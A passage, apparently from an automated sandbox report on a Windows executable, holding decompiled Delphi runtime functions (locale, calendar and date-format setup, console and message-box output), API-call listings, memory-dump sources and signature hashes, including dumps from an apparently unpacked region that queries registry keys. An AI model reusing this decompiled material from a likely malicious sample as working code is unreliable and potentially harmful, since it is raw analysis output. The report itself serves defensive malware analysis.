                                                						E004161AC(1, 1, 1, __eflags, __fp0);
                                                						_v40 = E004048D8();
                                                						_v36 = 1;
                                                						asm("fild qword [ebp-0x24]");
                                                						 *((long long*)( *0x5037a0 + 0x10)) = _t174;
                                                						asm("wait");
                                                						EnumCalendarInfoW(E00416B84, GetThreadLocale(), _t139, 4);
                                                						_v16 =  *0x5037a0;
                                                						_t91 = _v16;
                                                						__eflags = _t91;
                                                						if(_t91 != 0) {
                                                							_t95 = _t91 - 4;
                                                							__eflags = _t95;
                                                							_t91 =  *_t95;
                                                						}
                                                						_t147 = _t91 - 1;
                                                						__eflags = _t147;
                                                						if(_t147 > 0) {
                                                							_t110 = 1;
                                                							do {
                                                								 *((intOrPtr*)( *0x5037a0 + 4 + (_t110 + _t110 * 2) * 8)) = 0xffffffff;
                                                								_t110 = _t110 + 1;
                                                								_t147 = _t147 - 1;
                                                								__eflags = _t147;
                                                							} while (_t147 != 0);
                                                						}
                                                						EnumCalendarInfoW(E00416C28, GetThreadLocale(), _t139, 3);
                                                					}
                                                				} else {
                                                					EnumCalendarInfoW(E00416B84, GetThreadLocale(), _t139, 4);
                                                					_v12 =  *0x5037a0;
                                                					_t99 = _v12;
                                                					if(_t99 != 0) {
                                                						_t99 =  *((intOrPtr*)(_t99 - 4));
                                                					}
                                                					_t149 = _t99 - 1;
                                                					if(_t149 >= 0) {
                                                						_t150 = _t149 + 1;
                                                						_t111 = 0;
                                                						do {
                                                							 *((intOrPtr*)( *0x5037a0 + 4 + (_t111 + _t111 * 2) * 8)) = 0xffffffff;
                                                							_t111 = _t111 + 1;
                                                							_t150 = _t150 - 1;
                                                						} while (_t150 != 0);
                                                					}
                                                					EnumCalendarInfoW(E00416C28, GetThreadLocale(), _t139, 3);
                                                				}
                                                				_v20 =  *0x5037a0;
                                                				_t106 = _v20;
                                                				if(_t106 != 0) {
                                                					_t106 =  *((intOrPtr*)(_t106 - 4));
                                                				}
                                                				_push(_t106);
                                                				E00408478();
                                                				_v24 =  *0x5037a0;
                                                				_t64 = _v24;
                                                				if(_t64 != 0) {
                                                					_t64 =  *((intOrPtr*)(_t64 - 4));
                                                				}
                                                				_t144 = _t64 - 1;
                                                				if(_t144 >= 0) {
                                                					_t145 = _t144 + 1;
                                                					_t107 = 0;
                                                					do {
                                                						_t118 =  *0x4137f4; // 0x4137f8
                                                						E00407AC0( *((intOrPtr*)(_v8 + 0xbc)) + (_t107 + _t107 * 2) * 8, _t118,  *0x5037a0 + (_t107 + _t107 * 2) * 8);
                                                						_t107 = _t107 + 1;
                                                						_t145 = _t145 - 1;
                                                					} while (_t145 != 0);
                                                				}
                                                				_t128 =  *0x416ae0; // 0x416ae4
                                                				E0040859C(0x5037a0, _t128);
                                                				_v28 =  *0x5037a0;
                                                				_t68 = _v28;
                                                				if(_t68 != 0) {
                                                					_t68 =  *(_t68 - 4);
                                                				}
                                                				 *0x50379c = _t68;
                                                				_pop(_t129);
                                                				 *[fs:eax] = _t129;
                                                				_push(0x416f4f);
                                                				return E00405A88( *0x5037a4);
                                                			}






































                                                0x00416cc0
                                                0x00416cc0
                                                0x00416cc1
                                                0x00416cc3
                                                0x00416ccb
                                                0x00416cce
                                                0x00416cd1
                                                0x00416cd5
                                                0x00416cd6
                                                0x00416cdb
                                                0x00416cde
                                                0x00416ce1
                                                0x00416cf3
                                                0x00416cfa
                                                0x00416cfb
                                                0x00416d00
                                                0x00416d03
                                                0x00416d08
                                                0x00416d0e
                                                0x00416d1f
                                                0x00416d24
                                                0x00416d37
                                                0x00416d49
                                                0x00416d53
                                                0x00416db6
                                                0x00416db9
                                                0x00416dc4
                                                0x00416dca
                                                0x00416ddb
                                                0x00416de0
                                                0x00416ded
                                                0x00416df9
                                                0x00416dfc
                                                0x00416e01
                                                0x00416e08
                                                0x00416e1b
                                                0x00416e25
                                                0x00416e28
                                                0x00416e2b
                                                0x00416e33
                                                0x00416e36
                                                0x00416e45
                                                0x00416e4f
                                                0x00416e52
                                                0x00416e55
                                                0x00416e57
                                                0x00416e59
                                                0x00416e59
                                                0x00416e5c
                                                0x00416e5c
                                                0x00416e60
                                                0x00416e61
                                                0x00416e63
                                                0x00416e65
                                                0x00416e6a
                                                0x00416e73
                                                0x00416e7b
                                                0x00416e7c
                                                0x00416e7c
                                                0x00416e7c
                                                0x00416e6a
                                                0x00416e8d
                                                0x00416e8d
                                                0x00416d55
                                                0x00416d63
                                                0x00416d6d
                                                0x00416d70
                                                0x00416d75
                                                0x00416d7a
                                                0x00416d7a
                                                0x00416d7e
                                                0x00416d81
                                                0x00416d83
                                                0x00416d84
                                                0x00416d86
                                                0x00416d8f
                                                0x00416d97
                                                0x00416d98
                                                0x00416d98
                                                0x00416d86
                                                0x00416da9
                                                0x00416da9
                                                0x00416e97
                                                0x00416e9a
                                                0x00416e9f
                                                0x00416ea4
                                                0x00416ea4
                                                0x00416ea6
                                                0x00416eba
                                                0x00416ec7
                                                0x00416eca
                                                0x00416ecf
                                                0x00416ed4
                                                0x00416ed4
                                                0x00416ed8
                                                0x00416edb
                                                0x00416edd
                                                0x00416ede
                                                0x00416ee0
                                                0x00416ef8
                                                0x00416efe
                                                0x00416f03
                                                0x00416f04
                                                0x00416f04
                                                0x00416ee0
                                                0x00416f0c
                                                0x00416f12
                                                0x00416f1c
                                                0x00416f1f
                                                0x00416f24
                                                0x00416f29
                                                0x00416f29
                                                0x00416f2b
                                                0x00416f32
                                                0x00416f35
                                                0x00416f38
                                                0x00416f47

                                                APIs
                                                  • Part of subcall function 004058A8: GetTickCount.KERNEL32 ref: 004058DF
                                                  • Part of subcall function 004058A8: GetTickCount.KERNEL32 ref: 004058F7
                                                  • Part of subcall function 0041622C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041624A
                                                • GetThreadLocale.KERNEL32(00000000,00000004), ref: 00416D58
                                                • EnumCalendarInfoW.KERNEL32(00416B84,00000000,00000000,00000004), ref: 00416D63
                                                • GetThreadLocale.KERNEL32(00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00416D9E
                                                • EnumCalendarInfoW.KERNEL32(00416C28,00000000,00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00416DA9
                                                • GetThreadLocale.KERNEL32(00000000,00000004), ref: 00416E3A
                                                • EnumCalendarInfoW.KERNEL32(00416B84,00000000,00000000,00000004), ref: 00416E45
                                                • GetThreadLocale.KERNEL32(00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00416E82
                                                • EnumCalendarInfoW.KERNEL32(00416C28,00000000,00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00416E8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: InfoLocale$CalendarEnumThread$CountTick
                                                • String ID: 09A$B.C.$jA
                                                • API String ID: 1601775584-2936603287
                                                • Opcode ID: 3ddd55871247ead042fa03ab5a000ea6b2f1b29fd689d7c3102f82412ed522d0
                                                • Instruction ID: d23605a2abee2f08ff48bd89d78aeba7779998b9b416ce6c05e90c4c60aee192
                                                • Opcode Fuzzy Hash: 3ddd55871247ead042fa03ab5a000ea6b2f1b29fd689d7c3102f82412ed522d0
                                                • Instruction Fuzzy Hash: 5A61D9B4A006059FD710EF69DC81A9E77B9FB88314B11857AE904E73A1D738DE41CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004093B1,?,?), ref: 00779415
                                                • RegOpenKeyExW.ADVAPI32(80000001,004093C0,00000000,000F0019,?,00000000,?,00000105,00000000,004093B1,?,?), ref: 0077945E
                                                • RegOpenKeyExW.ADVAPI32(80000002,004093C0,00000000,000F0019,?,80000001,004093C0,00000000,000F0019,?,00000000,004093B1,?,?), ref: 00779480
                                                • RegOpenKeyExW.ADVAPI32(80000001,004093FC,00000000,000F0019,?,80000002,004093C0,00000000,000F0019,?,80000001,004093C0,00000000,000F0019,?,00000000), ref: 0077949E
                                                • RegOpenKeyExW.ADVAPI32(80000002,004093FC,00000000,000F0019,?,80000001,004093FC,00000000,000F0019,?,80000002,004093C0,00000000,000F0019,?,80000001), ref: 007794BC
                                                • RegOpenKeyExW.ADVAPI32(80000001,00409430,00000000,000F0019,?,80000002,004093FC,00000000,000F0019,?,80000001,004093FC,00000000,000F0019,?,80000002), ref: 007794DA
                                                • RegOpenKeyExW.ADVAPI32(80000001,00409464,00000000,000F0019,?,80000001,00409430,00000000,000F0019,?,80000002,004093FC,00000000,000F0019,?,80000001), ref: 007794F8
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,00409464,00000000,000F0019,?,80000001,00409430), ref: 00779538
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001), ref: 00779563
                                                • RegCloseKey.ADVAPI32(?,0040939B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,004093C0), ref: 007795DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Open$QueryValue$CloseFileModuleName
                                                • String ID:
                                                • API String ID: 2701450724-0
                                                • Opcode ID: e783b76fae9d7cbe9ae9cad6cf855b6db60d2a89546f793595698cc69ab423f4
                                                • Instruction ID: 4f13a82c28c392d4ccf5ecabc20863801aa2de39f4e7ffd3daa5bd5cbfe1e7ca
                                                • Opcode Fuzzy Hash: e783b76fae9d7cbe9ae9cad6cf855b6db60d2a89546f793595698cc69ab423f4
                                                • Instruction Fuzzy Hash: D7511375A4021CFEEF61DAA4CC46FAE73BCDF08740F618065BA18F61C2D678AA51CA54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E004162A4(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v8;
                                                				char _v12;
                                                				char _v16;
                                                				char _v20;
                                                				char _v24;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				char _v56;
                                                				char _v60;
                                                				int _t55;
                                                				void* _t121;
                                                				void* _t128;
                                                				void* _t151;
                                                				void* _t152;
                                                				intOrPtr _t172;
                                                				intOrPtr _t204;
                                                				signed short _t212;
                                                				int _t214;
                                                				intOrPtr _t216;
                                                				intOrPtr _t217;
                                                				void* _t224;
                                                
                                                				_t224 = __fp0;
                                                				_t211 = __edi;
                                                				_t216 = _t217;
                                                				_t152 = 7;
                                                				do {
                                                					_push(0);
                                                					_push(0);
                                                					_t152 = _t152 - 1;
                                                				} while (_t152 != 0);
                                                				_push(__edi);
                                                				_t151 = __edx;
                                                				_t214 = __eax;
                                                				_push(_t216);
                                                				_push(0x416589);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t217;
                                                				_t55 = IsValidLocale(__eax, 1);
                                                				_t219 = _t55;
                                                				if(_t55 == 0) {
                                                					_t214 = GetThreadLocale();
                                                				}
                                                				_t172 =  *0x41392c; // 0x413930
                                                				E0040859C(_t151 + 0xbc, _t172);
                                                				E00416CC0(_t214, _t151, _t151, _t211, _t214, _t219, _t224);
                                                				E00416980(_t214, _t151, _t151, _t211, _t214);
                                                				E00416A3C(_t214, _t151, _t151, _t211, _t214);
                                                				E0041622C(_t214, 0, 0x14,  &_v20);
                                                				E00406CAC(_t151, _v20);
                                                				E0041622C(_t214, 0x4165a4, 0x1b,  &_v24);
                                                				 *((char*)(_t151 + 4)) = E004147DC(0x4165a4, 0, _t219);
                                                				E0041622C(_t214, 0x4165a4, 0x1c,  &_v28);
                                                				 *((char*)(_t151 + 0xc6)) = E004147DC(0x4165a4, 0, _t219);
                                                				 *((short*)(_t151 + 0xc0)) = E00416278(_t214, 0x2c, 0xf);
                                                				 *((short*)(_t151 + 0xc2)) = E00416278(_t214, 0x2e, 0xe);
                                                				E0041622C(_t214, 0x4165a4, 0x19,  &_v32);
                                                				 *((char*)(_t151 + 5)) = E004147DC(0x4165a4, 0, _t219);
                                                				_t212 = E00416278(_t214, 0x2f, 0x1d);
                                                				 *(_t151 + 6) = _t212;
                                                				_push(_t212);
                                                				E0041701C(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
                                                				E00406CAC(_t151 + 0xc, _v36);
                                                				_push( *(_t151 + 6) & 0x0000ffff);
                                                				E0041701C(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
                                                				E00406CAC(_t151 + 0x10, _v40);
                                                				 *((short*)(_t151 + 8)) = E00416278(_t214, 0x3a, 0x1e);
                                                				E0041622C(_t214, 0x4165f8, 0x28,  &_v44);
                                                				E00406CAC(_t151 + 0x14, _v44);
                                                				E0041622C(_t214, 0x41660c, 0x29,  &_v48);
                                                				E00406CAC(_t151 + 0x18, _v48);
                                                				E004069A8( &_v12);
                                                				E004069A8( &_v16);
                                                				E0041622C(_t214, 0x4165a4, 0x25,  &_v52);
                                                				_t121 = E004147DC(0x4165a4, 0, _t219);
                                                				_t220 = _t121;
                                                				if(_t121 != 0) {
                                                					E00406CF4( &_v8, 0x416630);
                                                				} else {
                                                					E00406CF4( &_v8, 0x416620);
                                                				}
                                                				E0041622C(_t214, 0x4165a4, 0x23,  &_v56);
                                                				_t128 = E004147DC(0x4165a4, 0, _t220);
                                                				_t221 = _t128;
                                                				if(_t128 == 0) {
                                                					E0041622C(_t214, 0x4165a4, 0x1005,  &_v60);
                                                					if(E004147DC(0x4165a4, 0, _t221) != 0) {
                                                						E00406CF4( &_v12, L"AMPM ");
                                                					} else {
                                                						E00406CF4( &_v16, L" AMPM");
                                                					}
                                                				}
                                                				_push(_v12);
                                                				_push(_v8);
                                                				_push(":mm");
                                                				_push(_v16);
                                                				E00407590(_t151 + 0x1c, _t151, 4, _t212, _t214);
                                                				_push(_v12);
                                                				_push(_v8);
                                                				_push(L":mm:ss");
                                                				_push(_v16);
                                                				E00407590(_t151 + 0x20, _t151, 4, _t212, _t214);
                                                				 *((short*)(_t151 + 0xa)) = E00416278(_t214, 0x2c, 0xc);
                                                				 *((short*)(_t151 + 0xc4)) = 0x32;
                                                				_pop(_t204);
                                                				 *[fs:eax] = _t204;
                                                				_push(0x416590);
                                                				return E00406A08( &_v60, 0xe);
                                                			}





























                                                0x004162a4
                                                0x004162a4
                                                0x004162a5
                                                0x004162a7
                                                0x004162ac
                                                0x004162ac
                                                0x004162ae
                                                0x004162b0
                                                0x004162b0
                                                0x004162b5
                                                0x004162b6
                                                0x004162b8
                                                0x004162bc
                                                0x004162bd
                                                0x004162c2
                                                0x004162c5
                                                0x004162cb
                                                0x004162d0
                                                0x004162d2
                                                0x004162d9
                                                0x004162d9
                                                0x004162e1
                                                0x004162e7
                                                0x004162f0
                                                0x004162f9
                                                0x00416302
                                                0x00416314
                                                0x0041631e
                                                0x00416333
                                                0x00416342
                                                0x00416355
                                                0x00416364
                                                0x0041637a
                                                0x00416391
                                                0x004163a8
                                                0x004163b7
                                                0x004163ca
                                                0x004163cc
                                                0x004163d0
                                                0x004163e1
                                                0x004163ec
                                                0x004163f5
                                                0x00416406
                                                0x00416411
                                                0x00416426
                                                0x0041643a
                                                0x00416445
                                                0x0041645a
                                                0x00416465
                                                0x0041646d
                                                0x00416475
                                                0x0041648a
                                                0x00416494
                                                0x00416499
                                                0x0041649b
                                                0x004164b4
                                                0x0041649d
                                                0x004164a5
                                                0x004164a5
                                                0x004164c9
                                                0x004164d3
                                                0x004164d8
                                                0x004164da
                                                0x004164ec
                                                0x004164fd
                                                0x00416516
                                                0x004164ff
                                                0x00416507
                                                0x00416507
                                                0x004164fd
                                                0x0041651b
                                                0x0041651e
                                                0x00416521
                                                0x00416526
                                                0x00416531
                                                0x00416536
                                                0x00416539
                                                0x0041653c
                                                0x00416541
                                                0x0041654c
                                                0x00416561
                                                0x00416565
                                                0x00416570
                                                0x00416573
                                                0x00416576
                                                0x00416588

                                                APIs
                                                • IsValidLocale.KERNEL32(?,00000001,00000000,00416589,?,?,?,?,00000000,00000000), ref: 004162CB
                                                • GetThreadLocale.KERNEL32(?,00000001,00000000,00416589,?,?,?,?,00000000,00000000), ref: 004162D4
                                                  • Part of subcall function 00416278: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041637A,?,00000001,00000000,00416589), ref: 0041628B
                                                  • Part of subcall function 0041622C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041624A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Locale$Info$ThreadValid
                                                • String ID: AMPM$09A$2$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                • API String ID: 233154393-883918716
                                                • Opcode ID: fdb5538a9b06cfa99486f28ba651596c5750f2b5066976838adddfba7b733d54
                                                • Instruction ID: 95a7bddb840ee677bf0daabfca62effc83962940e19971429c5d1e15ccf5a563
                                                • Opcode Fuzzy Hash: fdb5538a9b06cfa99486f28ba651596c5750f2b5066976838adddfba7b733d54
                                                • Instruction Fuzzy Hash: 79713030700108ABDB01FBA5D841BDE77AAEF88304F52807BF505AB68ADB3DD956875D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00775AF8: GetTickCount.KERNEL32 ref: 00775B2F
                                                  • Part of subcall function 00775AF8: GetTickCount.KERNEL32 ref: 00775B47
                                                • GetThreadLocale.KERNEL32(00000000,00000004), ref: 00786FA8
                                                • EnumCalendarInfoW.KERNEL32(00416B84,00000000,00000000,00000004), ref: 00786FB3
                                                • GetThreadLocale.KERNEL32(00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00786FEE
                                                • EnumCalendarInfoW.KERNEL32(00416C28,00000000,00000000,00000003,00416B84,00000000,00000000,00000004), ref: 00786FF9
                                                • GetThreadLocale.KERNEL32(00000000,00000003,00416B84,00000000,00000000,00000004), ref: 007870D2
                                                • EnumCalendarInfoW.KERNEL32(00416C28,00000000,00000000,00000003,00416B84,00000000,00000000,00000004), ref: 007870DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: CalendarEnumInfoLocaleThread$CountTick
                                                • String ID: 09A$B.C.$SVWUj$jA
                                                • API String ID: 559552752-3833838168
                                                • Opcode ID: da3ef4ee8698bd30782b0b30e8045500b90a98b35a04bbc9edd405ff5d527242
                                                • Instruction ID: b494a2a14d2631fa8f896d6bd25d91940e06f1daed03688629782261195ce4be
                                                • Opcode Fuzzy Hash: da3ef4ee8698bd30782b0b30e8045500b90a98b35a04bbc9edd405ff5d527242
                                                • Instruction Fuzzy Hash: 2161D5B0A40605DFDB10EF68DC89A9E77A9FB88750B218535E905D73A2D739DE01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNEL32(00000000,00000000,004F6D12), ref: 00866BA1
                                                • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000001,00000080,00000000,00000000,004F6D12), ref: 00866CDA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: File$CreateDelete
                                                • String ID: DO$GetNamedPipeClientSessionId$LO$LO$NdrProxyForwardingFunction4
                                                • API String ID: 1264090339-1640843040
                                                • Opcode ID: 518c23d147a51c244c441e2e873cdb988a8ce36efcc6c552713f0013b3310d01
                                                • Instruction ID: c9c9a3317588874d5478db62b9bbc047695d90edaa0b4bef073ac28f007504c1
                                                • Opcode Fuzzy Hash: 518c23d147a51c244c441e2e873cdb988a8ce36efcc6c552713f0013b3310d01
                                                • Instruction Fuzzy Hash: 83F1C374E00248DFCB00DFE9E985AADBBF5FB08305F21852AE505EB225E734A955CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000001,00000000,00416589,?,?,?,?,00000000,00000000), ref: 00786524
                                                  • Part of subcall function 007864C8: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,007865CA,?,00000001,00000000,00416589), ref: 007864DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: AMPM$ fA$09A$0fA$2$AMPM $m/d/yy$mmmm d, yyyy
                                                • API String ID: 4232894706-3960306321
                                                • Opcode ID: ef4a070c670a389abddd9e0c7a0432e5a17d450dfe487b038de32d0c4cc554b5
                                                • Instruction ID: aaec9947123bb4d1b0f83edef034abc6e5ae9158075779a10a9d47a38ace292f
                                                • Opcode Fuzzy Hash: ef4a070c670a389abddd9e0c7a0432e5a17d450dfe487b038de32d0c4cc554b5
                                                • Instruction Fuzzy Hash: 45718030740449EBDB01FBA4D845BDE76BAEF88740F50C076F508AB24ADB3DDA468769
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E00417598(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				char* _v8;
                                                				long _v12;
                                                				short _v140;
                                                				short _v2188;
                                                				void* _t15;
                                                				char* _t17;
                                                				intOrPtr _t19;
                                                				intOrPtr _t30;
                                                				long _t48;
                                                				intOrPtr _t56;
                                                				intOrPtr _t57;
                                                				int _t61;
                                                				void* _t64;
                                                
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_v8 = 0;
                                                				_push(_t64);
                                                				_push(0x4176bd);
                                                				_push( *[fs:ecx]);
                                                				 *[fs:ecx] = _t64 + 0xfffff778;
                                                				_t61 = E004173A0(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
                                                				_t17 =  *0x4ff0d0; // 0x500054
                                                				if( *_t17 == 0) {
                                                					_t19 =  *0x4fefc0; // 0x40c158
                                                					_t11 = _t19 + 4; // 0xffeb
                                                					LoadStringW(E00408664( *0x503620),  *_t11,  &_v140, 0x40);
                                                					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
                                                				} else {
                                                					_t30 =  *0x4fefe8; // 0x50033c
                                                					E00404608(E00404944(_t30));
                                                					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
                                                					_push(_t48);
                                                					E00408478();
                                                					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
                                                					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
                                                					WriteFile(GetStdHandle(0xfffffff4), 0x4176d8, 2,  &_v12, 0);
                                                				}
                                                				_pop(_t56);
                                                				 *[fs:eax] = _t56;
                                                				_push(0x4176c4);
                                                				_t57 =  *0x417568; // 0x41756c
                                                				return E0040859C( &_v8, _t57);
                                                			}
















                                                0x004175a1
                                                0x004175a2
                                                0x004175a5
                                                0x004175aa
                                                0x004175ab
                                                0x004175b0
                                                0x004175b3
                                                0x004175c6
                                                0x004175c8
                                                0x004175d0
                                                0x0041766e
                                                0x00417673
                                                0x00417682
                                                0x0041769c
                                                0x004175d6
                                                0x004175d6
                                                0x004175e0
                                                0x004175fe
                                                0x00417600
                                                0x0041760f
                                                0x0041762c
                                                0x00417644
                                                0x0041765e
                                                0x0041765e
                                                0x004176a3
                                                0x004176a6
                                                0x004176a9
                                                0x004176b1
                                                0x004176bc

                                                APIs
                                                  • Part of subcall function 004173A0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041754C), ref: 004173D3
                                                  • Part of subcall function 004173A0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004173F7
                                                  • Part of subcall function 004173A0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00417412
                                                  • Part of subcall function 004173A0: LoadStringW.USER32(00000000,0000FFEA,?,00000100), ref: 004174AD
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,004176BD), ref: 004175F9
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041762C
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041763E
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00417644
                                                • GetStdHandle.KERNEL32(000000F4,004176D8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 00417658
                                                • WriteFile.KERNEL32(00000000,000000F4,004176D8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041765E
                                                • LoadStringW.USER32(00000000,0000FFEB,?,00000040), ref: 00417682
                                                • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041769C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                • String ID: luA
                                                • API String ID: 135118572-3978237923
                                                • Opcode ID: 81e3b915b899ff7018954e0c3b2f462436dec9106beb02eccbf0b296c2bf358f
                                                • Instruction ID: 575b4e763a00b0bec5c17776c31b2c26187b782050d429d4d4936ba6163c07df
                                                • Opcode Fuzzy Hash: 81e3b915b899ff7018954e0c3b2f462436dec9106beb02eccbf0b296c2bf358f
                                                • Instruction Fuzzy Hash: 383141B1644204BFE710EB95CC82FEA76ACEB04714F50417AB604F71D1DE746E808B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E00408E58(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                				char _v8;
                                                				void* _t18;
                                                				signed short _t28;
                                                				intOrPtr _t35;
                                                				intOrPtr* _t44;
                                                				intOrPtr _t47;
                                                
                                                				_t42 = __edi;
                                                				_push(0);
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_t44 = __edx;
                                                				_t28 = __eax;
                                                				_push(_t47);
                                                				_push(0x408f5c);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t47;
                                                				EnterCriticalSection(0x502c0c);
                                                				if(_t28 !=  *0x502c24) {
                                                					LeaveCriticalSection(0x502c0c);
                                                					E004069A8(_t44);
                                                					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
                                                						if( *0x502c08 == 0) {
                                                							_t18 = E00408B40(_t28, _t28, _t44, __edi, _t44);
                                                							L004027FC();
                                                							if(_t28 != _t18) {
                                                								if( *_t44 != 0) {
                                                									_t18 = E004074B0(_t44, E00408F74);
                                                								}
                                                								L004027FC();
                                                								E00408B40(_t18, _t28,  &_v8, _t42, _t44);
                                                								E004074B0(_t44, _v8);
                                                							}
                                                						} else {
                                                							E00408D3C(_t28, _t44);
                                                						}
                                                					}
                                                					EnterCriticalSection(0x502c0c);
                                                					 *0x502c24 = _t28;
                                                					E004089C0(0x502c26, E00407330( *_t44), 0xaa);
                                                					LeaveCriticalSection(0x502c0c);
                                                				} else {
                                                					E004073C4(_t44, 0x55, 0x502c26);
                                                					LeaveCriticalSection(0x502c0c);
                                                				}
                                                				_pop(_t35);
                                                				 *[fs:eax] = _t35;
                                                				_push(E00408F63);
                                                				return E004069A8( &_v8);
                                                			}









                                                0x00408e58
                                                0x00408e5b
                                                0x00408e5d
                                                0x00408e5e
                                                0x00408e5f
                                                0x00408e61
                                                0x00408e65
                                                0x00408e66
                                                0x00408e6b
                                                0x00408e6e
                                                0x00408e76
                                                0x00408e82
                                                0x00408ea9
                                                0x00408eb0
                                                0x00408ec2
                                                0x00408ecb
                                                0x00408edc
                                                0x00408ee1
                                                0x00408ee9
                                                0x00408eee
                                                0x00408ef7
                                                0x00408ef7
                                                0x00408efc
                                                0x00408f04
                                                0x00408f0e
                                                0x00408f0e
                                                0x00408ecd
                                                0x00408ed1
                                                0x00408ed1
                                                0x00408ecb
                                                0x00408f18
                                                0x00408f1d
                                                0x00408f37
                                                0x00408f41
                                                0x00408e84
                                                0x00408e90
                                                0x00408e9a
                                                0x00408e9a
                                                0x00408f48
                                                0x00408f4b
                                                0x00408f4e
                                                0x00408f5b

                                                APIs
                                                • EnterCriticalSection.KERNEL32(00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883,?,?,00000000,00000000,00000000), ref: 00408E76
                                                • LeaveCriticalSection.KERNEL32(00502C0C,00502C0C,00000000,00408F5C,?,?,?,00000000,?,00409824,00000000,00409883,?,?,00000000,00000000), ref: 00408E9A
